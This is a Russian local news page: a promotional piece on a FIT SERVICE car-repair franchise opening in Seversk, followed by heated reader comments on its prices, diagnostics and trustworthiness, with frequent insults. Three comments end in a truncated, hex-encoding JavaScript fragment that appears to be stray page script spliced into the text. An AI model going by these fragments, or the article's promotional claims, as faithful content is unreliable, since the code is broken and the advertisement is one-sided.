Последние комментарии:

позавчера в 23:54 написал ponni
09.11.2024 00:00 написал ponni
29.10.2024 18:48 написал ponni
27.10.2024 16:10 написал ТЕРРАН
27.10.2024 16:07 написал ТЕРРАН
27.10.2024 16:04 написал ТЕРРАН
24.10.2024 22:25 написал sprinter
18.10.2024 07:53 написал sprinter
12.10.2024 10:47 написал alex33kaw
10.10.2024 08:51 написал sprinter
02.10.2024 19:41 написал ponni
27.09.2024 16:36 написал ponni
24.09.2024 17:28 написал sprinter
24.09.2024 16:48 написал sprinter
20.09.2024 21:45 написал sprinter


В Северск пришла одна из крупнейших федеральных сетей автосервисов


Теперь для жителей Северска качественный ремонт и обслуживание автомобилей стали доступнее.

В Северск пришла одна из крупнейших федеральных сетей автосервисов

Порой так тяжело найти автосервис, где качественно и комплексно обслужат автомобиль и дадут гарантию. Автосервисы есть, но куда податься?
29 апреля в Северске открылся новый автосервис федеральной сети FIT SERVICE по адресу Первомайская, 2. Теперь северчанам не придется ездить в Томск или звонить друзьям и знакомым в надежде узнать, где сделают качественный ремонт автомобиля.

FIT SERVICE – это:

СОБСТВЕННЫЙ СКЛАД АВТОЗАПЧАСТЕЙ
Больше не нужно ехать через весь город за редкой запчастью или заказывать в интернете. Теперь всё в одном месте – быстро и удобно.

СОВРЕМЕННОЕ ОБОРУДОВАНИЕ
Все станции оснащены самым современным оборудованием, которым зачастую не могут похвастаться даже официальные дилерские центры.

КВАЛИФИЦИРОВАННЫЙ ПЕРСОНАЛ
Все специалисты FIT SERVICE систематически повышают свою квалификацию в собственном тренинговом центре FIT LAB, где преподают ведущие технические специалисты со всего мира.

В Северск пришла одна из крупнейших федеральных сетей автосервисов

ЧЕСТНАЯ ГАРАНТИЯ 1 ГОД
FIT SERVICE – это автосервис, которому можно доверять, так как на все выполненные работы и установленные запчасти даётся 1 год честной гарантии.

СЕРТИФИЦИРОВАННЫЙ СЕРВИС
Все станции FIT SERVICE сертифицированы и осуществляют поддержку дилерской гарантии и завода изготовителя, поэтому при обслуживании в FIT SERVICE сохраняется гарантия дилера.

РЕМОНТ АВТОМОБИЛЕЙ ЛЮБЫХ МАРОК
Какая бы ни была у Вас машина – будь то любимая отцовская «девятка» или шикарный новенький Porshe – добро пожаловать в FIT SERVICE!

БЕСПЛАТНАЯ ДИАГНОСТИКА
Лучший способ оценить — это попробовать. В честь открытия FIT SERVICE дарит всем клиентам бесплатную комплексную диагностику автомобиля.

В Северск пришла одна из крупнейших федеральных сетей автосервисов

Записывайтесь на бесплатную диагностику ходовой части автомобиля прямо сейчас по ссылке: promo.fitauto.ru или по тел. 8 (3822)28-33-55. Количество мест ограничено!





Автор: vseverske.info

Категория: Новости » Северск » Авто

Комментарии: (81) 

12 мая 2016   -16

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: Renamed
Ну держитесь, северские ездюки вам повыносят мозги с честной гарантией 1 год lol

Комментарий № 2:

Написал: тайга

Вот и первые результаты , у них нет спеца сделать такую простейшую работу как перебрать главный цилиндр сцепления , т.е. сделать работу которую с легкостью выполнит любой пацан имеющий «таза» .                                                                                Народ , берегите свои авто от невежд , вдумчиво подходите к выбору ремонтников , это сохранит ваше имущество а возможно и жизнь !!!



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 3:

Написал: difm
доступ в рем. зону есть?

Комментарий № 4:

Написал: Мефодий
и подвеску, конечно же, будут делать на подьёмнике.
смотровых ям скорее всего нет. 

Комментарий № 5:

Написал: MrSpoil
Мефодий,
Какие еще предположения выдвинете?
Яма то нынче барская роскошь 

Комментарий № 6:

Написал: PeterThePig
тайга,
скорее всего тут такая же ситуация, как на любом производстве. Вот пример - есть вилочные электропогрузчики, без которыз функционирование практически любого предприятия остановится. Управлять им может любой, кто умеет ездить на велосипеде, на говоря о автомобиле. Но при этом, если не пройдено обучение на право управления погрузчиком, то ТБшник поставит раком и работягу, и его начальника. Поэтому и отправляют учиться. Тут конечно не иденчитная ситуация, но подозреваю, что в официальных сервисах рабочие должны быть аттестованы на проведение резного рода работ.
П.С. чинюсь только и исключительно у одного и того же гаражного мастера уже лет 8. Все свои машины ему одному доверяю )

Комментарий № 7:

Написал: Мефодий
Цитата: MrSpoil
Яма то нынче барская роскошь 
тогда там только телеги латать.

Комментарий № 8:

Написал: MrSpoil
Мефодий,
С сарказом то батенька у вас проблемы,вы видимо в северск обслуживаетесь на вибростендах исключительно

Комментарий № 9:

Написал: Пуля
Как будто к дорогам в довесок
нам в городе сервис открыли,
чтоб люди проблему подвесок,
свою наконец позабыли.

Комментарий № 10:

Написал: A59
Обычная реклама для блондинок и лохов. Ни один настоящий мастер не будет работать на федералов, - у него всегда очередь по протекции и гарантия - честь и совесть (у меня есть такой). 

Комментарий № 11:

Написал: Arteq
В Томске сделать диагностику подвески уже около 1000 р стоит, у нас же 300-500 руб.
Прайс бы глянуть 

Комментарий № 12:

Написал: 2беды
Arteq,
http://fitauto.ru/price/
Через сайт запись еще скидка у них 3% на услуги 


--------------------
...дураки и дороги

Комментарий № 13:

Написал: gigi
difm,
НЕт!О чем вы говорите?!Погуглите что есть сеть фитсервис:))))


--------------------
Если б я имел коня....

Комментарий № 14:

Написал: Shadowofsand
gigi,
СЕТЬ.. громко сказано))
Чинюсь только у одного рукастого. НАреканий нет

Комментарий № 15:

Написал: Tofik
хочешь чтоб было хорошо - делай сам!)


--------------------
Ещё 6 лет стабильности!

Комментарий № 16:

Написал: Lois
Складывается впечатление, что у нас в Северске у многих людей девиз по жизни "лишь бы грязью облить". Я понимаю, когда приводят конкретные доводы, факты, нобольшинство- это пустой треп с догадками. Не умоляю не в коем случае таланты "гаражных" мастеров, но по факту чаще всего привозя им машину, вы слышите что-то типа "ну посмотрим, по цене разберемся, надо залезть глянуть"....и топаете оставив свою "ненаглядную" по ж/д путям через гаражные кооперативы, в полном неведении когда вы получите ее обратно и сколько отдадите за ремонт (основываюсь на своем опыте). Здорово если у вас есть человек, которому вы верите на слово и доверяете ему уже 5-10 лет свои колеса. Но тогда откуда вам знать, как обслуживают в других местах. Живем в 21 веке. Я предпочту подождать на удобном диване с чашкой кофе, глядя на экран, что происходит с моей машиной, и зная сколько это займет времени и сумму которую придется выложить (получив гарантию, прошу заметить)
 Большинство тех кто рвется в рем. Зону, даже смутно понимают, что должны там увидеть))) сервис открылся на днях, как то не верно судить за такой короткий промежуток времени, особенно сидя на диване... Так что великие критики, рассуждайте здраво, не марайте репутацию людям, которые еще не успели ее заработать, ни плохую ни хорошую и будте добрее и умнее

Комментарий № 17:

Написал: 2беды
Shadowofsand,
хахахаххаха,чинюсь у рукастого...аахахахха,вслушайся))))))
Обычно делают ТО,а вот рукастые "чинят" так,что потом и остается дальше чиниться)Извините за тафталогию)


--------------------
...дураки и дороги

Комментарий № 18:

Написал: 2беды
Lois,
Не нужно больших дедуктивных способностей,чтобы убедиться в вашем впечатлении от коментаторов.Почитайте историю сообщений тайги, gigi и тд...


--------------------
...дураки и дороги

Комментарий № 19:

Написал: ТЕРРАН
А В ЭТОМ СЕРВИСЕ НЕ  ТЕЖЕ ЛЮДИ РАБОТАЮТ== ЧТО У ЧАСТНИКА!?В ОСОБЕННЫХ ШКОЛАХ ВОСПИТЫВАЛИСЬ, КОЛЛЕДЖАХ!?И НАЗВАНИЕ НЕ МОГЛИ ЧТО НИБУДЬ НА МЕСТНОМ ЯЗЫКЕ????????  ВСЕ СТРЕМЯТСЯ В ЕВРОПУ!?

Комментарий № 20:

Написал: Lois
ТЕРРАН,
Какая разница на каком языке название? Да, уже давно русский язык наш разбавили иностранные слова, что кудахтать то теперь по этому поводу. Вот взять вас, вроде на русском пишите, а читать то невозможно...если уж так радеете за русский язык, то подтяните грамматику

Комментарий № 21:

Написал: MrSpoil
Lois,
и загуглит ,что такое Caps Lock lol lol 

Комментарий № 22:

Написал: Hornet
Цитата: тайга
Вот и первые результаты , у них нет спеца сделать такую простейшую работу как перебрать главный цилиндр сцепления , т.е. сделать работу которую с легкостью выполнит любой пацан имеющий «таза» .

Как бы понятие слова "ремонт" здесь нужно уточнить.
Внимательно прочитайте текст вверу:
СЕРТИФИЦИРОВАННЫЙ СЕРВИС
Все станции FIT SERVICE сертифицированы и осуществляют поддержку дилерской гарантии и завода изготовителя, поэтому при обслуживании в FIT SERVICE сохраняется гарантия дилера.

По поводу сохранения гарантии дилера - вот это главный развод.
В остальном всё нормально.
Просто пора уже привыкнуть, что подобные конторы, как и официальный дилер у которого вы купили свой автомобиль, занимаются заменой вышедших из строя узлов и легкодоступных деталей. Никто не будет вам перебирать сложный узел - вам предложат/навяжут его ЗАМЕНУ.
Так что контора обычная, на европейский манер.
С обещаниями сохранения гарантии дилера будьте ПООСТОРОЖНЕЙ, чтобы не пожалеть потом.

Комментарий № 23:

Написал: Немой
Это сервис для людей с деньгами...нет денег ремонтируйте своими руками....не пойму ....зачем обсирать людей у которых не ремонтировались...а для тайги специально....если у вас побежал манжет..то дело не только в нем....дело ещё и выработки цилиндра....и никто не даст вам гарантию год...засунув новый манжет в убитый цилиндр....хотя...проблему можно решить и с убитым цилиндром...изготовить матрицу большего размера...сварить манжет.. и в путь....только стоить это будет на много больше чем новый узел...вообщем...не был в этом сервисе...ничего плохого или хорошего сказать не могу...но хотелось бы послушать тех кто там обслужился...и не делетантов..а тех кто в теме

Комментарий № 24:

Написал: navator
Ура друзья, наконец то наша деревня вышла из каменного века, теперь здесь есть настоящий автосервис, и по праву это теперь называется городом, ну как же раньше жили...
Вы блин серьзно? вам сервисов не хватает?
закрой глаза укажи пальцем в любую сторону, открой глаза, сервис...

это звуит как люди ну наконец то вы теперь будете ходить в кандалах, вот вам шарик, радуйтесь...

естественно думать что из Москвы приедут мастера с опытом работы более двадцети лет, не прийдётся, и не нужно, так не будет.

здесь вчерашние охранники из супермаркетов
и представители прекрасной сети магазина м-видео,
на глазах становятся супер специалистами, выучив технический термин за пять минут,

ну да ладно, это даже хорошо, рабочие места всё же, безработица ведь в городе

но стыдно должно говорить о гарантиях когда о правде нет и слова,

было бы всё гораздо проще сказать:

Привет, я классный мужик, я директор сервиса, хочу зарабатывать в вашем городе деньги, вот вам шарики, и рабочие места, правда не очень то оплачиваемые но места, ведь за эту же зарплату вы ни где в этом городе так не испачкаете руки как здесь))



--------------------
Кто любит людей, тот владеет вселенной. Жестокий - силен, но сильнее - смиренный. …

Комментарий № 25:

Написал: Tharus
А ценник то у них не хилый. Плата за громкое имя?


--------------------
Я старый пират и не знаю слов лицензионного соглашения!..

Комментарий № 26:

Написал: Lois
navator,
А непосредственно ремонтом автомобиля занимаются тоже продавцы из М-видео и охранники? Очень заиньересовал этот вопрос, уж простите

Комментарий № 27:

Написал: f1gv83
по подвеске отбоя 100% не будет )))

Комментарий № 28:

Написал: Мефодий
Цитата: Tharus
А ценник то у них не хилый. Плата за громкое имя?
 
шарики и мягкий диван денег стоят,чем больше контора,тем выше ценник. 

Комментарий № 29:

Написал: Arteq
1000 рублей за диагностику подвески? ноу коментс...
рекламировать сервис не буду, но в северске есть место, где и на диване посидеть можешь и подвеску за 500р посмотрят... 
 

Комментарий № 30:

Написал: тайга
Цитата: PeterThePig
П.С. чинюсь только и исключительно у одного и того же гаражного мастера уже лет 8. Все свои машины ему одному доверяю )
 Согласен ! У меня аналогичная ситуация , любой ремонт любой из машин исключительно у одного мастера которому полностью доверяю !   А здесь как то все скользко и мутно (мое личное впечатление) , начиная с такого комментатора как «MrSpoil» который то демонстрирует углубленные познания во всех их производственных процессах , а потом открещивается что мол никакого отношения к ним не имеет !  Да невозможность увидеть хваленое «супер-пупер» яко бы имеющееся оборудование и сам процесс работы хотя бы со стороны и с безопасного расстояния так же не внушает доверия лично у меня ! Да и отзывы их бывших клиентов в других городах – это вообще кошмар !!!

 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 31:

Написал: Gold999
Arteq,
В томске докавто хоть в ремзоне смотри вместе с ремонтником  который тебе показывает что менять надо, что стучит, хоть кофе пей - ценник 300 рубле, вместе с фото фиксацией что менять надо. 

Комментарий № 32:

Написал: Lois
На сайте же написано, что сервис работает по франшизе, а значит у каждого сервиса свои "хозяева", следовательно не имеет смысла отталкиваться от комментариев об этих сервисах в других городах, разве не так? В общем сколько людей, столько и мнений, настараживает лишь одно - здесь только пара комментариев тех людей, которые этот сервис уже посетили

Комментарий № 33:

Написал: MrSpoil
тайга,
Какие углубленные позднания производственного процесса,а леший из тайги?
На водяной в томске в фите,правила абсолютно такие же,как и 41 салоне по всей России,для особо упоротых как ты они прописанны на стене в угоке клиента.Достаточно 1 посещения ,чтобы усвоить принцип работы сто.Ради одного тебя "клиент всегда прав" могу предложить пожевать говна lol  ,такие клиенты ваще не обосрались там,без тебя необанкротятся.Иди пожалуйся маме,что не посетив сто,были задеты твои чувста ,и твое мнение сформировалось и ты на северске инфо всех отговариваешь посещать фит сервис

Комментарий № 34:

Написал: qazx
MrSpoil,
Я могу сказать только одно... когда контора кричит, что она супер пупер то соответственно и сервис должен быть на уровне и работники должны быть с большим опытом работы, а на деле один из сервисов (fitservice) я постоянно консультирую по электрике...да проблема клиента решается.. он и не должен знать как была решена его проблема, но самому сервису не надо громко кричать что они супер, а другие сервисы фуфло.
По поводу гарантии: на сегодняшний день на все запчасти действует гарантия от 6 месяцев и до 5лет на автоэлектронику. Так что с честной гарантией тоже пролет
По поводу обслуживания новых машин тоже фуфел. Весь ремонт автомобиля я могу производить сам и просто так авто не слетит с гарантии. При наступлении гарантийного случая дилер должен доказать что поломка произошла по вине владельца.  Но общаясь по работе с менеджерами автосалонов я спросил как-то про гарантийный ремонт и ответ был поразительный: у нас установка от директора любым способом сделать так чтобы хозяин оплатил ремонт т.е. поатно а не по гарантии 

Комментарий № 35:

Написал: Турист
Купил ниссан два года назад у дилера на Ивановского у него и обслуживаюсь, какие проблемы-то?

Комментарий № 36:

Написал: тайга
MrSpoil,

Приведи мою цитату где я отговариваю посещать этот сервис . Ну что , ответишь за слова ?   А кроме того , я высказываю свою точку зрения , не нравится , не читай !  А вот ты я посмотрю аж из штанов выскакиваешь , упираешься , доказываешь что это супер-сервис . Личный интерес ? Ты сам то был там ?

А вообще народ сам разберется , но я думаю что после косячного ремонта комментарии многим глаза откроют  , многие вспомнят о чем я тут говорил . Как говорится время покажет !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 37:

Написал: MrSpoil
тайга,
Интерес в том чтобы они развивались,а поо таких как ты,даже в родительский день не вспоминают.Забытая серая масса квартирных псевдопророков.И не буду я приводить цитат никаких,неворуженным взглядом видно,что ты олень постсоветской закалки...и явно уж ты не тот клиент,которого хотели бы видеть в фите...

Комментарий № 38:

Написал: Evgen 2
Немой,
Поэтому я и сам все эти ГТЦ и РТЦ у машин с большим пробегом меняю безжалостно. Но сколько же приходится потратить времени и нервов на этих тупых клиентов, обьясняя им что это узел муртв, у меня просто появляется желание запихать эту деталь ему же в проход задний. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 39:

Написал: xabk
Цитата: Arteq
1000 рублей за диагностику подвески? ноу коментс... рекламировать сервис не буду, но в северске есть место, где и на диване посидеть можешь и подвеску за 500р посмотрят...   


В личку мне пишите продиагностирую за 500 р. ;) В свете доходов населения нашего города и убитости дорог сделаю скидку от цен сервиса.;)))) Да к стати наши власти вместо того чтобы ремонтит дороги замутили еще 4 фонтана ;) 

Комментарий № 40:

Написал: Evgen 2
Вот интересно. А что слесарь расматривает у раф 4 в районе передней стойки? для нормальной диагностики передней подвески такого авто, надо для начала хотя бы скинуть колёсик, и всё досканально проверить, вплоть до состояния тормозных дисков и тормозных колодок и направляющих.  

Комментарий № 41:

Написал: 2беды
Evgen 2,
в моей диагностической карте прописанно ДОСЛОВНО
"Осмотр производится только при наличии технической возможности ,без разбора узлов и агрегатов. 


--------------------
...дураки и дороги

Комментарий № 42:

Написал: Evgen 2
2беды,
Демонтаж колеса, это не разбор узла и агрегата. На многорычажной подвеске без демонтажа колеса диагностику провести очень тяжело. Это не просто макферсон, тут всё намного сложнее. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 43:

Написал: 2беды
Evgen 2,
мб вы и правы,открутить болты это не разбор


--------------------
...дураки и дороги

Комментарий № 44:

Написал: 2беды
Пожалуй стоит оставить свой отзыв о посещении данного СТО
Начну с минусов.
Наблюдение за авто лишь с видеонаблюдения,но в финале есть возможность зайти(если попросить на ресепшене),в халате и каске и вам покажут что с вашим авто сделала наша дорога.
Нет обычного телевидения.
Углубленный осмотр у  них не подразумевает раскручивание узлов и тд.
Картинка видеонаблюдения перескакивает с одного бокса к другому и так по кругу.
Теперь плюсы.
Удобный способ записаться к ним
Внесение в базу вашего авто и ведение истории его обслуживания
Чистый и свежий интерьер
Идентичная комната ожидания
В гараже порядок,и чистота,чему был удивлен.
Механик который расказал ,что с авто очень внятно и доступно обьяснил ,что к чему

Имея опыт обслуживания у диллера,они взяли у них эту модель по всей видимости,поэтому все так же как у них,не настолько масштабно конечно,но все же.
Ремонт там я не производил никакой,поэтому сказать о квалификации персонала тоже ничего не могу. 
Нормальное местечко короче 


--------------------
...дураки и дороги

Комментарий № 45:

Написал: Evgen 2
2беды,
А за 1000 руб, я вам проведу диагностику всей ходовой части и тормозной системы, заодно проверю состояние масла, тормозной жидкости, воздушного фильтра и жижи в ГУР и АКПП. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 46:

Написал: 2беды
Evgen 2,
вы про что?какие 1000?Зачем вводить в заблуждение людей,диагностика на подьемнике у нис по сайту стоит 490 рублей,состояние жидкостей они на приборах мне замерили и написали в диагностической карте,в процентном соотношении.
Собаки лают,караван идет
 


--------------------
...дураки и дороги

Комментарий № 47:

Написал: home131
Какие высокие цены ? Вы обкуренные ? коллега по работе отдавала машину туда, хонда фит. Цена ремонта: 2200 рублей. Работы за эту сумму: замена бушинков (передние 2шт.), замена сайлентблоков (2 шт.), замена стабилизаторов поперечной устойчивости (2 шт.), замена ступичного (передний), и что-то еще было. 

Офигенно дорого . просто жесть! это же 2200, Карл!  

Комментарий № 48:

Написал: ardoardo
Даю месяцев пять  и этот Fit  развалитсяв этом тухлом Северске…

Комментарий № 49:

Написал: Lois
Кто бы что ни говорил и в Северске найдется своя "целевая аудитория". Рановато для прогнозов. Лучше уж ФитСервис , чем очередная Мария Ра

Комментарий № 50:

Написал: ardoardo
Подъёмник, дядя Петя , съёмник…

Комментарий № 51:

Написал: тайга
MrSpoil,

Из твоих комментов следует , что ты пистабол не умеющий отвечать за свои слова , который вложился в этот бизнес , и под видом «гласа народно» пытаешься его продвигать , причем так тупо что  расчет явно на лохов.  Ты не способен вести нормальный диалог , не хватает ума аргументированно и обоснованно изложить свое мнение , а потому тебе остается только перейти на оскорбления , что ты осел молодой и делаешь !   То как ты себя ведешь – явно указывает на то какой это будет сервис и какое будет отношение к клиентам и народ это скоро поймет сам. Или ты думаешь что все лохи , которые купились на шарики ??? Читай что пишут знающие люди и как расчехляют всю эту лож !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 52:

Написал: MrSpoil
тайга,
ЖУЙ говно с закрытым ртом ,еще бы я в коментах занимал оборону,будучи участником бизнеса.Те кто в силах смочь такое сделать сто в северске на твой пердеж даже бы внимания не обратили,у них я думаю приоритеты гораздо выше

Комментарий № 53:

Написал: тайга

Согласен на все 100% , я тоже об этом заметил  ! Вообще это фото говорит о многом ! Во первых о том что никакого диагностического супер-пупер оборудования по подвески у них нет . Во вторых вся эта диагностика полное фуфло , гадание на кофейной гуще и ковыряние в носу ! Как можно диагностировать  подвеску  просто подняв авто на подъемнике и не сняв даже колеса ?  Или спец настолько крут что посветить фонариком под арку ему достаточно что бы узнать износ дисков , колодок , пальцев рулевых тяг , шаровых  ? А работоспособность  стоек он как телепатически определяет ? А люфты подшипников ступиц ?   Народ я убежден вся эта диагностика полное фуфло и вот почему ,  нормальную диагностику можно сделать или инструментально  (на хорошем стенде ) или исключительно с полной разборкой  подвески !  А с фонариком можно увидеть лишь рваные манжеты ну и растрескавшиеся саленблоки и не более того , но это не есть диагностика подвески !!! 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 54:

Написал: тайга
MrSpoil,

Дебил , а ты чё тогда здесь жопу рвешь , ковна обжувался ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 55:

Написал: тайга
Цитата: ardoardo
Подъёмник, дядя Петя , съёмник…
 J + 100 500

 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 56:

Написал: Duk
тайга,
Приветствую! Забей на переписку с этим человеком! Это исполнительный директор этого сервиса,очень молодой и очень амбициозный Евгений З.
 Диагноз ты ему уже поставил,все лохи,а он Д"Артаньян!
 Увы,ни что его не исправит! 

Комментарий № 57:

Написал: MrSpoil
тайга,
Я то не рву попа,а лишь хочу в очередной твой скептический пердак подорвать

Комментарий № 58:

Написал: 2беды
MrSpoil,
Троллинг слишком толст.


--------------------
...дураки и дороги

Комментарий № 59:

Написал: тайга
Duk,

J  ОК  ………… + 100 500 !!! 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 60:

Написал: тайга

А теперь по существу , что бы не заниматься пустой болтовнёй . Если кто может ответьте  на ряд конкретных вопросов  относительно данного сервиса , по которым можно реально судить об его уровне .  Какой станочный парк имеется в сервисе , какие есть станки , токарный , фрезерный , шлифовальный и т.д. ?  Еще более конкретный вопрос : ЗМЗ 406 газель , ГБЦ , восстановление пастелей РВ ? Цена ? Сроки ? Описание технологического процесса ?   Перечень выполняемых работ по реставрации ГБЦ ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 61:

Написал: MrSpoil
тайга, wink
Вали в гараж ремонтировать свое ведро плетущееся в правой полосе,там никто тебе ниче ремонтировать не будут,неси готовые детали,поставят,не устраивает такой расклад,экономь дальше на своей помойке lol 

Комментарий № 62:

Написал: Seversk-7
Посмотрел фотки с открытия сервиса. Вроде все лица адекватные, негатива пока нет, как у некоторых которые там и близко даже не были. Записался на диагностику))

Комментарий № 63:

Написал: xabk
тайга,
Ваше познание авто техники улыбнули. Для того чтобы определить люфт, жужание и т.д. и т.п. в подшибнике ступицы колесо не снимают, т.к. нет смысла делать лишнюю работу ;) Это всеравно что переносить воду ведром и ложкой, вроде вода переносится в обоих случаях. А смотрит он туда - 1. Позирует на фото. 2. Состояние пыльника, пружины и не ли течи стойки. Ну а вообще сажу я вам на подьемнике деагнозы подвеске ставят только не от большого ума. Для нормальной диагностики необходимо чтобы подвеска была в рабочем положении, а не вытянута.  

Комментарий № 64:

Написал: Lois
Блин, смеюсь от души))))) и директора то в числе комментаторов вычислили и всех работников сервиса то грязью полили))) Вы серьезно? Думаете руководитель сервиса сейчас сидит и кусается с вами за репутацию своего "чада"? ;) Думаю у него дела поважнее есть. И смешно и обидно, по таким личностям как вы и делают выводы о населении нашего города к сожалению. Люди *опы рвут, пытаются цивилизацию в наше захолустье продвигать, а вы сразу "навариться, впихнуть, навязать, ободрать". Как будто вас туда тащат против вашей воли. Или вы пытаетесь "защитить" людей от обмана? А может просто пора перестать навязывать другим свои совковые замашки? Каждый сам вправе выбирать где ему питаться, работать, ремонтировать автомобиль. Пусть люди сами делают выводы. Это был всего лишь рекламный пост, чтобы оповестить людей об открытии сервиса. Не хотите, не едте!  Сидите не обманутые, самые умные на диване и гордитесь собой :)

Комментарий № 65:

Написал: тайга
MrSpoil,

 С тобой и с твоим тухлым сервисом все ясно – лохотрон !!! Ремонт никакой , сплошные понты !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 66:

Написал: тайга
Lois,

Это дело каждого , выразить свое мнение каким бы оно не было !  Тебя же никто не упрекает и не ограничивает когда ты выражаешь свое мнение ! Будь терпимей , сколько людей столько и мнений !



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 67:

Написал: тайга
Цитата: xabk
. Для того чтобы определить люфт, жужание и т.д. и т.п. в подшибнике ступицы колесо не снимают
 Ну улыбаться это хорошо , полезно для здоровья )))) А вот что касается диагностики ступичных подшипников , тут ты прав только в одном , колесо снимать не нужно .  Подшипник на весу может и не гудеть , а лишь при нагрузке , а иногда только при повороте . А поэтому диагностируется либо на ходу , либо на стенде , но никак не на подъемнике !

 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 68:

Написал: Lois
тайга,
Мне просто хватает мозгов, чтобы не оскорбить и не обвинять бездоказательно в надувательстве и др. Грехах незнакомых мне людей. И я самый терпимый в мире человек, за исключением одной детали...нелюблю пустой звон.

Комментарий № 69:

Написал: тайга
Lois,
Lois,

А если чужое мнение не совпадает с твоим , для тебя это оскорбительно ?



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 70:

Написал: тайга
Цитата: Lois
MrSpoil
 А вообще я тебе скажу так , больше чем «MrSpoil» этому сервису  никто не нагадил , хотя он и рвет опу за него ! )))



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 71:

Написал: Lois
тайга,
Во-первых не было сказано, что вы оскорбили меня. Нет, меня не оскорбляет чужое мнение, даже отличное от моего. Считайте, что я за справедливость. А что касается Mr. Spoil, не заметно, что он что то рвал за сервис, просто видимо тоже за справедливость человек. Но видимо уж жутко вы его раздражаете. В общем уже ни о чем дискуссия. Я считаю, что все новое интересно и достойно внимания. Будь то новый спорт комплекс, контактный зоопарк или сервис...Может не стоит сразу бросаться в критику? А то складывается впечатление, как будто вы бабки на лавке во дворе, все у вас "простит*ки и наркоманы"

Комментарий № 72:

Написал: 2беды

Lois,
В какое бы русло не вытекал этот конфликт между участниками дискусии,что от мистераспоила с его резкими высказываниями,что от тайги с его скепсисом...вывод один.
Эти товарищи привлекли к себе внимание,мне понравилось.А черный пиар-это тоже пиар и разумный человек ,делает выводы лишь на основе собственного мнения. У нас пол страны слушает зомбоящик и хавает это,видимо тайга решил следовать данному принципу,ожидая что все поведуться на его рецензии о фитсервисе.Я не повелся,сьездил,остался доволен сервисом,но состоянием своей подвески честно говоря подрастроен.



--------------------
...дураки и дороги

Комментарий № 73:

Написал: Lois
2беды, Собственно ваш ник подтверждает все вами сказаное)))) 

Комментарий № 74:

Написал: qazx
MrSpoil,
Вибростенд когда будет у Вас?

Комментарий № 75:

Написал: sprinter
радость то какая,а где заводы по производству бензина,а где по переработке отходов-мусора-пластика,так и будем гадить экологию?

Комментарий № 76:

Написал: тайга

В деле распространения здравых мыслей не обойтись, чтобы кто-нибудь паскудой не назвал !

Михаил Салтыков-Щедрин 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 77:

Написал: Лиса
Кину и я свои пять копеек.
Честно скажу, в сервисе не была и вряд ли буду. По крайней мере, до формирования какой-никакой репутации оного.
Кстати, не очень приятное впечатление производит стиль рекламной статьи - много громких самохвальных утверждений при полном отсутствии стажа (конкретного автосервиса).
Почему конкретного? А потому что франшиза. Никакая это нафиг не "сеть". Думаю, все помнят АЗС "Лукойл" на Киргизке, которая никакой на самом деле не "Лукойл". Вот поэтому-то и важна конкретная репутация конкретного сервиса. А это требует времени.
К тому же ни для кого не секрет, что Северск для многих благих начинаний может оказаться проклятым местом (как Тольяти, где, согласно анекдоту, какое производство не открывай, всё равно говённые жигули получаются lol).
Яркий пример - Инвитро. Вроде бы классная российская сеть лабораторий, график удобный и качество тоже гарантированное. Тем не менее, в северском отделении в первую же неделю медсёстры начали с работы пораньше убегать ("суббота же"), а теперь и вовсе из ряда вон - одному дядьке знакомому, что 20 лет с одной почкой живёт, выдали результаты анализов спортсмена-комсомольца (впервые за те же 20 лет)! Никаких экстрасенсов не надо с такими "магами и чародеями".
В общем, работайте, ребята, а время покажет. Клиент, как говорится, проголосует рублём. Лично от себя посоветовала бы систематизировать все типичные для Северска отрицательные моменты работы сферы услуг и сконцентрироваться в недопущении подобного в своей работе fellow  

Комментарий № 78:

Написал: мимокрокодил
ну как? гавном покидалились, закрывайте комментарии smile 

Комментарий № 79:

Написал: Lois
sprinter,
Так займитесь же этим, все вас на ручках носить будем!

Комментарий № 80:

Написал: Palllud
Заехал на бесплатную диагностику в Fitservice  итоге по диагностической карте:
1. Потрескан ремень навесного.
2. Подтеки масла с переднего сальника коленвала.
3. По подвеске замечаний не выявлено.
, при этом автомобиль был с заведомо известными мне неисправностями выявлеными ранее:
1. Стуки и неисправности задних аммортизаторов стоек (вытекли, требуется замена).
2. Отсутствие давления газа подпора в аммортизаторе передней левой стойки.
3. Износ втулок стабилизатора поперечной устойчивости.
4. Повреждение пыльника левой шаровой опоры.
5. Подтеки масла из под прокладки поддона (а не переднего сальника).
6. Износ направляющих тормозных суппортов.
